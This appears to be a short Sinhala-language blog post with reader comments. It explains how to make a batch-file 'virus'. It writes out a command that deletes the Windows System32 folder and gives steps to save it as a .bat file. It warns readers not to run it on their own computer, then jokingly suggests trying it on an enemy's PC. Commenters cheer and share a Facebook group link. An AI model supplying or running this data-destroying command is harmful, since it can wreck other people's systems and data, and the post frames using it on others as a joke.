
මේක පොඩි සරල code එකක්.
****මේක බැරි වෙලාවත් ඔයාගෙ computer එකේ නම් run කරන්න එපා..****
1. Notepad එකක් අරන් පහල code එක copy paste කරන්න.
@echo off del c:\windows\system32
2. ඒක කැමති නමකින් save කරගන්න. හැබැයි නම අගට .bat කියල එන්න ඕනෙ.
Eg: virus.bat
****මේක බැරි වෙලාවත් ඔයාගෙ computer එකේ නම් run කරන්න එපා..****
මේකෙන් System32 file එක delete කරනව. Windows crash වෙනව..
වැඩ කරනවද බලන්නම ඕනෙ නම් තරහකාරයෙක්ගෙ PC එකක run කරල බලන්න.. (එහෙම කරන්ඩත් එපා.. පව්නෙ...)
එල එල මචෝ ඔන්න මාත් හදාගත්තා. Run කරලා බලන්නද? හික්ස්.
ReplyDeletehttp://www.facebook.com/group.php?gid=120074181337432&v=wall
එල එල.. :D ඔන්න මමත් facebook group එකට set වුනා...
ReplyDelete